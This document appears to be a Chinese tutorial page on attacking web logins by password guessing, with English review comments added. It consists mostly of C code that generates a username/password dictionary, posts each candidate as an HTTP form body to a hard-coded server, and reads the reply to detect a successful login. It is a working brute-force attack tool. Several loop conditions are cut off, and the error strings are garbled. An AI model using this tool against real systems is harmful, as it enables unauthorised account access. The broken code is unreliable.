基于網頁的口令攻擊的實現
1、攻擊字典實現(簡單實現,在已知口令位數前提下,且限制字典庫口令數目):
#include
#include
#include
// Constants and alphabet used by the dictionary generator below.
#define USERLEN 7 // username length; not referenced in the code shown, which hard-codes 7
#define PASSLEN 9 // password length; not referenced in the code shown, which hard-codes 9
// Array size of `table`. The literal holds 62 characters, so 63 counts the
// terminating NUL and table[62] is '\0'.
// NOTE(review): jinweiadd() wraps a digit only when it reaches SIZEOFTABLE, so a
// digit can take the value 62 and select that NUL byte as a character.
#define SIZEOFTABLE 63
static char table[SIZEOFTABLE] = "1234567890QWERTYUIOPqwertyuiopasdfghjklASDFGHJKLmnbvcxzZXCVBNM";
// Increments one counter digit in place ("jinwei" = carry).
// Returns 1 and resets the digit to 0 when it reaches SIZEOFTABLE,
// otherwise returns 0 and leaves the incremented value in `count`.
int jinweiadd(int &count)
{
    count += 1;
    if (count != SIZEOFTABLE)
        return 0;
    count = 0; // wrapped around: report a carry to the caller
    return 1;
}
// Adds one to a 16-digit counter whose least significant digit is count[0].
// The carry reported by jinweiadd() is propagated upward until a digit
// does not wrap or all 16 digits have been visited.
void addcount(int count[16])
{
    int idx = 0;
    while (idx < 16 && jinweiadd(count[idx]) != 0)
        ++idx;
}
//
// Writes the candidate list "./字典.txt".
// Each record is the 35-byte form body "username=" + 7 characters +
// "&password=" + 9 characters, followed by CR LF. The characters come from
// `table`, selected by a 16-digit counter that is incremented after every
// record. Generation stops when the top digit reaches SIZEOFTABLE-1 or when
// 0xfffffff increments have been done, whichever happens first.
void makeone_usps()
{
unsigned test=0; // number of counter increments so far (checked against the cap below)
char userpas[40]={0}; // one assembled record
char *qian = "username="; // prefix, 9 characters
char *hou = "&password="; // separator, 10 characters
int count[16] = {0};// counter digits: [0..6] select the username, [7..15] the password
FILE *fp;
char *filename = "./字典.txt";
int j=0,t=0;
char user[8];
char pas[10];
int i = 0; // unused in this function
char huiche[2] = {'\r','\n'}; // CR LF record terminator
fp = fopen(filename,"wb"); // NOTE(review): result is not checked for NULL before use
while(1)
{
// generate one record and store it
for(j=0;j<7;j++)
{
user[j]=table[count[j]];
}
user[j] = 0;
// j runs 8..16 so that count[j-1] addresses digits 7..15
for(j=8;j<17;j++)
{
pas[j-8]=table[count[j-1]];
}
pas[j-8] = 0;
// bytes 0..8: "username="
for(t=0;t<9;t++)
{
userpas[t] = qian[t];
}
// bytes 9..15: the 7 username characters
for(;t<16;t++)
{
userpas[t] = user[t-9];
}
// bytes 16..25: "&password="
for(;t<26;t++)
{
userpas[t] = hou[t-16];
}
// bytes 26..35: the 9 password characters plus the NUL stored in pas[9]
for(;t<36;t++)
{
userpas[t] = pas[t-26];
}
fwrite(userpas,sizeof(char),35,fp); // return value not checked
fwrite(huiche,sizeof(char),2,fp);
// stop once the most significant digit has reached its last value
if(count[15]==SIZEOFTABLE-1)
break;
// NOTE(review): the leading '?' on the next four lines is residue from the
// page extraction, not part of the program.
?addcount(count);
?test++;
?if(test==0xfffffff)
?break;
}
fclose(fp);
}
// Copies one record of "./字典.txt" into usrpas and increments count.
// The file is reopened and read from its first byte on every call.
// usrpas must have room for 65 bytes: the function clears and fills exactly
// that many. If 65 bytes are read without meeting '\r', no NUL terminator is
// left inside those 65 bytes.
void getone_usps(char usrpas[],unsigned long &count)// count starts from zero
{
unsigned long i=0;
char mid; // single byte read from the file
FILE *fp;
char *filename = "./字典.txt";
fp = fopen(filename,"rb"); // NOTE(review): result is not checked for NULL before use
// NOTE(review): the loop condition below is cut off in this copy of the page
// (the text after '<' was lost). Presumably it skips `count` lines by counting
// '\n' bytes; confirm against the original.
while(i
{
fread(&mid,sizeof(char),1,fp); // return value ignored, so end-of-file is not detected
if(mid == '\n')
i++;
}
// clear the caller's buffer
for(i=0;i<65;i++)
{
usrpas[i]=0;
}
// copy bytes up to, but not including, the '\r' that ends the record
for(i=0;i<65;i++)
{
fread(&mid,sizeof(char),1,fp);
if(mid == '\r')
break;
usrpas[i]=mid;
}
fclose(fp);
count++; // the caller's index now refers to the next record
}
2、HTTP協議實現客戶端:
#include
#include
#pragma comment(lib,"ws2_32.lib")
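// Classifies one login response held in a 1024-byte receive buffer.
//
// Scans from offset 0x182 for the bytes "red". If they are found, the two
// bytes located 8 positions after the 'r' are compared with 0xb2 0xbb.
// Returns 0 when that byte pair is present (attempt rejected) and 1 in every
// other case, which the caller treats as a match. Because 1 is also returned
// when the marker is simply absent, a truncated read or an unrelated page
// (error, block or rate-limit response) is reported as a match as well.
//
// NOTE(review): 0x182, the "red" marker and 0xb2 0xbb are tied to one specific
// response page. Presumably the byte pair starts a GBK-encoded failure
// message; confirm against that page.
//
// Fix over the original: every index is checked against the buffer length.
// The original loop read buffer[i+2] past the end of the buffer, and after
// `i += 8` it could read several bytes past the end when the marker sat near
// the end. Both were out-of-bounds reads on data supplied by the remote server.
int compare(char buffer[])
{
    const unsigned int buflen = 1024; // size of the receive buffer callers pass in
    unsigned int i = 0x182;
    int found = 0;

    // Step of 2 kept from the original, which incremented i in both the loop
    // header and the loop body, so only even offsets are examined.
    for (; i + 2 < buflen; i += 2)
    {
        if (buffer[i] == 'r' && buffer[i + 1] == 'e' && buffer[i + 2] == 'd')
        {
            found = 1;
            break;
        }
    }
    if (!found)
        return 1;

    i += 8;
    if (i + 1 >= buflen)
        return 1; // marker too close to the end to be followed by the byte pair

    unsigned int a = (unsigned int)buffer[i] & 0xff;
    unsigned int b = (unsigned int)buffer[i + 1] & 0xff;
    if (a == 0xb2 && b == 0xbb)
        return 0;
    return 1; // treated by the caller as a match
}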
// Sends one request carrying `usrpas` to ServerIPAddr:ServerPort and classifies the reply.
//
// The request is the content of "./前奏.txt" followed by usrpas. A new Winsock
// session and TCP connection are created for every call, one send() and one
// recv() are issued, and the received bytes are handed to compare().
// Returns 1 when compare() returns 1, otherwise -1. The same -1 is returned for
// every Winsock failure, so a caller cannot tell a rejected attempt from a
// network error.
//
// NOTE(review): the early `return -1` paths skip closesocket() and WSACleanup().
int testonce(char *usrpas,char ServerIPAddr[],int ServerPort)
{
int flag = -1;
FILE *fp;//,*fp1,*fp2;
int i=0,j=0;
// Winsock startup data
WSADATA wsaData;
// client socket handle
SOCKET ClientSocket;
// server address
SOCKADDR_IN ServerAddr;
// outgoing request buffer
char SendData[1024];
fp = fopen("./前奏.txt","rb"); // NOTE(review): result is not checked for NULL before use
// Reads the file one byte at a time. The feof() test only becomes true after a
// failed read, so the loop runs once more than there are bytes; `i--` below undoes that.
// NOTE(review): i is never compared with sizeof(SendData), so a file of 1024
// bytes or more writes past the end of the buffer.
while(!feof(fp))
{
fread(&SendData[i],sizeof(char),1,fp);
i++;
}
i--;
int midsize = strlen(usrpas);
// NOTE(review): the loop header below is cut off in this copy of the page (the
// text after '<' was lost). Presumably it appends the midsize bytes of usrpas;
// confirm against the original. This append is not bounded by the buffer size either.
for(j = 0;j
{
SendData[i] = usrpas[j];
i++;
}
SendData[i] = 0;
fclose(fp);
char ReceiveBuffer[1024] = "";
int SendLength = -1;
int Result = -1;
// initialise Winsock
if((Result = WSAStartup(MAKEWORD(2,2),&wsaData))!=0)
{
printf("WSAStartup 失旛锿铩!錯(cuò)誤代碼:%d\n",Result);
return -1;
}
ClientSocket = socket(AF_INET,// address family
SOCK_STREAM,// stream socket type
IPPROTO_TCP);// TCP protocol
// NOTE(review): SOCKET is an unsigned type in Winsock, so this comparison cannot
// be true; failure is signalled by INVALID_SOCKET.
if(ClientSocket<0)
{
printf("socket 失斎赂ā簿姨!錯(cuò)誤代碼:%d\n",WSAGetLastError());
return -1;
}
memset(&ServerAddr,0,sizeof(ServerAddr));
// fill in SOCKADDR_IN,
// which holds the server's IP address and port;
// the address family is AF_INET
ServerAddr.sin_family = AF_INET;
// set the server port
ServerAddr.sin_port = htons(ServerPort);
// set the server IP address
ServerAddr.sin_addr.s_addr = inet_addr(ServerIPAddr);
// connect to the server
Result = connect(ClientSocket,// socket handle
(SOCKADDR*)&ServerAddr,// server address
sizeof(ServerAddr));// length of the address structure
if(Result<0)
{
printf("連接失敗!錯(cuò)誤代碼:%d\n",WSAGetLastError());
return -1;
}
// send the request
SendLength = send(ClientSocket,// socket handle
SendData,// send buffer
strlen(SendData),// length
0);// flags set to 0
if(SendLength<0)
{
printf("發(fā)送失敱馕弧准潭!錯(cuò)誤代碼:%d\n",WSAGetLastError());
return -1;
}
//else
//printf("sent data: %s\n",SendData);
int ReceiveLen;
// zero the receive buffer
memset(ReceiveBuffer,0,sizeof(ReceiveBuffer));
// receive the reply. Only one recv() is issued, so a reply delivered in several
// segments is seen only in part; ReceiveLen is not passed on to compare().
if((ReceiveLen = recv(ClientSocket,ReceiveBuffer,1024,0))<0)
{
printf("接收失敗域仇!錯(cuò)誤代碼:%d\n",WSAGetLastError());
return -1;
}
else
{
//printf("received data: %s\n",ReceiveBuffer);
if(compare(ReceiveBuffer)==1)
flag=1;
}
if(closesocket(ClientSocket)==SOCKET_ERROR)
{
printf("關(guān)閉socket失敗錯(cuò)誤代碼是%d\n",WSAGetLastError());
}
// release Winsock
if(WSACleanup() == SOCKET_ERROR)
{
printf("釋放Winsock失敗錯(cuò)誤代碼是%d\n",WSAGetLastError());
}
return flag;
}
3、三次握手驗證口令:
#include "Httptest.h"
#include "dic.h"
#include
// File-scope state shared between main() and the spinner thread.
int semfile1 = 0; // not referenced in the code shown
int semfile2 = 0; // not referenced in the code shown
unsigned long count=0; // index of the next dictionary record; advanced by getone_usps()
int threadnum=0; // not referenced in the code shown
int numcount=0; // not referenced in the code shown
// 0 while running, 1 when testonce() reported a match, 2 when count reached numofdic.
// Written by main() and read by thread() as a plain int, without synchronization.
int success = 0;
char result[90]; // not referenced in the code shown
int threadend=0; // not referenced in the code shown
// Console progress indicator run on a second thread.
// Cycles through "wait." .. "wait...." every 250 ms, clearing the console
// before each frame, until the global `success` becomes non-zero. It then clears
// the console once more and returns 1. `success` is written by main() on
// another thread and read here as a plain int, without synchronization.
DWORD WINAPI thread(LPVOID ptheread)
{
    static const char *const frames[4] = {"wait.", "wait..", "wait...", "wait...."};
    int stop = 0;

    while (!stop && success == 0)
    {
        for (int k = 0; k < 4; ++k)
        {
            system("cls");
            if (success != 0)
            {
                stop = 1; // leave the outer loop without re-reading `success`
                break;
            }
            printf("%s", frames[k]);
            _sleep(250);
        }
    }
    system("cls");
    return 1;
}
// Entry point: reads dictionary records one by one and submits each to one
// hard-coded server through testonce() until a match is reported or the
// records run out.
//
// Each pass is one TCP connection and one request (see testonce), issued
// sequentially from a single client, so per-account or per-source attempt
// limits on the server bound how many records this loop can try.
void main()
{
char usrpas[65]=""; // current "username=...&password=..." record
char ServerIPAddr[50] = "10.0.0.25"; // hard-coded server address (private 10.0.0.0/8 range)
int ServerPort = 80;
unsigned long numofdic=13; // number of dictionary records to try
DWORD threadid;
CreateThread(0,0,thread,0,0,&threadid); // starts the console spinner; the returned handle is discarded
// NOTE(review): the loop condition below is cut off in this copy of the page
// (the text after '<' was lost). Presumably it compares count with numofdic;
// confirm against the original.
while(count
{
getone_usps(usrpas,count); // fills usrpas and increments count
int flag = testonce(usrpas,ServerIPAddr,ServerPort);
if(flag==1)
{
success = 1; // also tells the spinner thread to stop
//printf("matching credentials: %s\n",usrpas);
break;
}
}
// NOTE(review): getone_usps() has already incremented count, so a match on the
// last record also satisfies this test and success is overwritten with 2.
if(count == numofdic)
success = 2;
_sleep(500); // leaves time for the spinner thread to notice `success` and clear the console
if(success == 1)
printf("成功密碼為%s\n",usrpas);
else
printf("字典庫(kù)中無(wú)合適的用戶名密碼\n");
return;
}